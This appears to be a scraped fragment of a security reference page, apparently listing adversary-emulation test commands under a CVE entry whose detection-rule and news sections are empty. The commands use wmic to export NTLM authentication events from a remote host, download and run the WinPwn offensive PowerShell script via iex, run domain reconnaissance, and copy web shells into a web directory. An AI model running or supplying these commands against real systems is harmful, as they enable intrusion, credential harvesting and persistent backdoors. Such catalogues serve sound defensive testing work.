$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.